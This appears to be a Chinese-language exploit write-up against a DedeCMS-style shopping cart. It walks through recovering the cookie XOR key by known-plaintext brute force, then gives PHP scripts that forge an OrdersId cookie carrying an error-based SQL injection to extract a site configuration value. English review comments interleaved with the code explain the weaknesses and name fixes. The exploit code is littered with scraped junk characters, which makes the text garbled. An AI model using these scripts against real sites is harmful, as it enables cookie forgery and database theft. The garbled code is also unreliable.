www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下这个shopcar类是如何生成cookie的
/**
 * Store $value in a client-side cookie named $key.
 *
 * Arrays are first flattened by enCode() (described on this page as
 * producing an "a=yy&b=cc" style string); every value then goes through
 * enCrypt() before setcookie().
 *
 * @param string $key   cookie name
 * @param mixed  $value scalar or array to store
 * @return void
 *
 * Review notes (defensive):
 * - The cookie carries no integrity check: nothing here lets the server
 *   tell a value it issued from one the client rewrote. Whatever reads this
 *   cookie back (on this page, "OrdersId" in MemberShops::__construct) has
 *   to treat the value as untrusted input and validate it.
 * - setcookie() receives only four arguments, so the HttpOnly and Secure
 *   attributes are not set.
 * - Lifetime is a hard-coded 36000 seconds (10 hours) on path "/".
 */
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        // enCode() itself is not part of this excerpt; only its use is visible.
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    setcookie($key,$value,time()+36000,'/');
}
简单地说,$key就是cookie的key,$value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的形式,关键是enCrypt函数。
/**
 * Obfuscate $txt for storage in a cookie.
 *
 * As written: pick a per-call key = md5(rand(0, 32000)); for each input
 * byte append the current key character followed by (byte XOR that key
 * character); finally run the doubled string through setKey() and
 * base64-encode it.
 *
 * @param string $txt plaintext cookie value
 * @return string base64 text; the encoded payload is twice the length of $txt
 *
 * Review notes (defensive):
 * - rand(0, 32000) yields at most 32001 distinct per-call keys, and srand()
 *   seeded from microtime() is not a cryptographic source.
 * - Each key character is written into the output in the clear, right
 *   before the byte it masks, so the per-call key adds no secrecy of its
 *   own; everything rests on setKey() and $cfg_cookie_encode.
 * - XOR provides no integrity. A server secret that is only XORed into data
 *   the client both chooses and reads back is recoverable, which is the
 *   weakness this page demonstrates. A keyed MAC over the cookie value
 *   (hash_hmac with a server secret, checked with hash_equals()) or a
 *   server-side cart keyed by session removes the problem; this XOR scheme
 *   cannot be patched into something safe.
 */
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));   // 32-character hex string
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index once it reaches the key length
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // key character in the clear, then the masked input byte
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
/**
 * Repeating-key XOR of $txt with md5(strtolower($cfg_cookie_encode)).
 *
 * The same 32-character hex key is applied to every cookie the site
 * issues. XOR is its own inverse, so the decode path presumably calls this
 * same function (the decode side is not in this excerpt).
 *
 * @param string $txt bytes to mask
 * @return string same length as $txt
 *
 * Review notes (defensive):
 * - strtolower() is applied before hashing, so letter case in the
 *   configured secret contributes nothing to the key.
 * - Repeating-key XOR with a fixed key exposes that key to anyone who knows
 *   one input together with its output, and cookie values are by
 *   construction visible to the client. This is why the order cookie on
 *   this page can be forged once the key is known. Protect cookie contents
 *   with a keyed MAC (hash_hmac) and verify it on read instead.
 */
function setKey($txt)
{
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index once it reaches the key length
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt的参数$txt我们是可知的,返回值就是cookie的值,这个我们也是可知的。
然后到了enCrypt调用setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode))。对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie。从推出的32000种md5(strtolower($cfg_cookie_encode))中,简单过滤掉非字母数字的key,就只剩下几百个可能的key;然后我们再重新下一次订单,再获取几百个可能的key,取交集,得到最终key。
具体代码如下:
<?php4 N- Y& H( w, h7 G2 R% ^: V
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here- w1 C9 f2 Q/ R$ N
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here0 x$ a3 q: L% N2 f4 u
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here( @. _4 o. \. g/ x1 L+ j
function reStrCode($code,$string)
+ E, p; \: ^7 S3 K{: N2 |2 A' [9 T2 q% b" o4 }5 h
$code = base64_decode($code);
5 _ [2 \ p) n6 [9 _' w4 i$key = “”;
8 o5 x+ i+ ]" W2 l5 W! V0 z% Ofor($i=0 ; $i<32 ; $i++)
' P$ d8 e8 e/ W1 l, k0 U# n; @{7 a# m1 d, \: o% c, ]% D: d
$key .= $string[$i] ^ $code[$i];- t0 D% k! ?: A2 e
}
$ {; h# E. M2 \0 Creturn $key;5 g0 g+ U. O8 T& C- ^9 y( n$ S
}6 c# D N* H5 M9 a
function getKeys($cookie,$plantxt)9 f) @2 r6 V' F6 a1 F! _
{( L0 s/ o! M3 L9 z) N7 x
$tmp = $cookie;
8 n# E8 e1 u/ O# u$results = array();
! ~& ]+ l! V# E' Y" z8 H4 W9 @% Wfor($j=0 ; $j < 32000; $j++)
: U: |2 C0 T) y{
9 w: Q( R6 f* y8 A4 b" X& o+ q
" {0 N8 G* ]/ v$ Q/ z$txt = $plantxt;( q5 n+ C+ v: P! D. Y: M- K
$ctr = 0;
9 B8 C' `/ t: q$tmp = ”;
' k* ?( `7 [: l$encrypt_key = md5($j);
1 Q) X, @0 u" zfor($i =0; $i < strlen($txt); $i ++)
$ t0 L, u% Y. I# G{
$ s7 ]) i8 S" U/ j' m: [$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;" v4 |8 P; {; a3 s2 L4 R
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
. C* g' ]! E2 c6 R; R9 i4 s. Z}
7 {# @/ l0 m; C/ y8 ~$string = $tmp;
4 V$ T3 G. d. U- F6 V$code = $cookie;# I q7 y0 ^, e1 S* U
$result = reStrCode($code,$string);$ t, p! c A/ v# T7 c q5 S W
if(eregi(‘^[a-z0-9]+$’,$result))
. O7 \: i5 x6 G/ ?# p! w1 ]/ u8 A( c{
" \- F4 c) {! V1 }! h: |echo $result.”\n”;! v. d( Q, y# p; y1 R
$results[] = $result;2 O1 t2 X2 ], H* e
}
) R! i$ O. Y. z. R6 P' L}
. H! a( L% O5 f Hreturn $results;7 [" N$ u; a7 Q5 h$ \
}
7 i: C3 I& q- o3 r6 Q0 z% ~$results1 = getKeys($cookie1,$plantxt);
9 p/ B( f' i9 B2 E' Z$results2 = getKeys($cookie2,$plantxt);
& H. U% t0 N; e' ?& Uprint “\n——————–real key————————–\n”;
5 n+ a2 r5 f6 K6 aforeach($results1 as $test1)
* m! x+ E1 V2 q' a! I) p: o{
; e7 {/ X7 r/ M$ E3 N/ H: Q: Hforeach($results2 as $test2)0 E0 N C+ h/ f/ |
{+ R: z& {; W$ @* L2 P( f
if($test1 == $test2)7 \! ?) }6 Z S0 i4 S, ~- a4 p
{
6 J5 p3 T* V: F! F0 T6 ~echo $test1.”\n”;
- p- X3 ]3 A; l$ F3 j5 c5 v' p& _, @}8 a$ z) z1 J ~! R
}
( Y! ^* |% ]+ B" [4 y0 z}; W ^( Z' ?; v
?>
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))。
得到这个key之后,我们就可以构造任意购物车的cookie。
接着看
20 class MemberShops0 V9 } H1 w& w+ T& i
21 {2 Y4 t8 I' F! t5 Y, C) j4 T
22 var $OrdersId;: m& A2 B8 E- U6 y) g. ~4 P
23 var $productsId;: M+ N' c2 Z' j u0 c
24
/**
 * Load the current order id from the "OrdersId" cookie, creating a new
 * order when the cookie is absent or empty.
 *
 * Review notes (defensive):
 * - $this->OrdersId comes from a client-supplied cookie and the only check
 *   applied is empty(); no format or ownership validation happens here.
 * - On this page the value is later interpolated into an SQL string in
 *   plus/carbuyaction.php, so anything that is not a canonical id (whatever
 *   MakeOrders() produces — not shown in this excerpt) should be rejected
 *   at this point, and the query should bind it as a parameter.
 */
function __construct()
{
    // getCookie() is presumably the read counterpart of saveCookie(); not shown here.
    $this->OrdersId = $this->getCookie("OrdersId");
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现OrdersId是从cookie里面获取的
然后
/plus/carbuyaction.php 中的:
$cart = new MemberShops();
// Order id recorded for this request. MemberShops::__construct() takes it
// from the "OrdersId" cookie, so this value is client-controlled.
$OrdersId = $cart->OrdersId;
……
// $OrdersId is interpolated straight into the query; no escaping or
// validation of it is visible in this excerpt, and it originates from a
// client cookie. Bind it as a query parameter, or at minimum reject any
// value that does not match the id format MakeOrders() produces.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
接着我们就可以注入了
通过利用下面代码生成cookie:
<?php
1 M. l2 M8 k) N$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;. R: L. J& z4 k- O( u# }1 T
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here3 ] {& K- u, K, k( n! S/ j
function setKey($txt)
9 L* z- L3 B2 A( ^8 J N{
% J0 N0 ^2 D5 K$ R8 Gglobal $encrypt_key;
* Q0 c8 c9 D$ b4 W+ H$ctr = 0;
7 ^$ c4 D# L& m6 I2 L- x* L$tmp = ”;. s8 r4 j( I t; |2 G& ~
for($i = 0; $i < strlen($txt); $i++)
$ ~* \% p' N6 v: x# B$ l{: n+ ? p) y; }5 N& C: G
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;8 S. ~5 m4 F! }, S [, P( ]' E, M
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];& `9 }; Q6 k8 _, D& |# Y1 D
}7 C8 `1 g- v! w- t0 g1 b
return $tmp;2 G# A( W) g/ ~5 u, g& L6 |
}9 z, g3 d5 x+ G) j# ?# f, Q
function enCrypt($txt)
1 i+ u+ y7 M- u9 k' E5 L{5 _# _: a7 T3 j" }) S9 ]% R N0 [
srand((double)microtime() * 1000000);
* d+ x8 p$ w" j0 ^$encrypt_key = md5(rand(0, 32000));
0 Z7 [) {1 l- K! |" Q) D$ctr = 0;$ G, z" t; j( L6 R
$tmp = ”;
/ h' s! [8 R! @9 u2 ?' lfor($i = 0; $i < strlen($txt); $i++)
6 p- [2 b9 \" B# s: q8 h B{4 m3 p! K+ y! w) F% n
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;; @) L9 d5 z+ n3 m
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);9 N% t0 ?5 O5 h) W# P
}8 @7 {) ?% o% g$ E& s4 w% s
return base64_encode(setKey($tmp));
* v6 D2 d7 v, r$ _}
n3 h( {) D. [for($dest =0;$dest = enCrypt($txt);)$ Z: y+ ~# i: b( `1 X. }
{
( _3 A) u4 c( {2 H! d8 |if(!strpos($dest,’+'))- f, `0 R1 v: P, J1 S
{
3 `) v2 i, f' }/ W4 I4 G# gbreak;3 X6 e- ^+ Q4 B3 K( r
}
4 t3 P5 W2 x- Z1 X2 J# a}9 M$ M+ S, l( j5 u! P
echo $dest.”\n”;& `3 w5 C, b0 K# N
?>" M, W: \" c% l
5 k+ o3 u; g" i/ n# @
|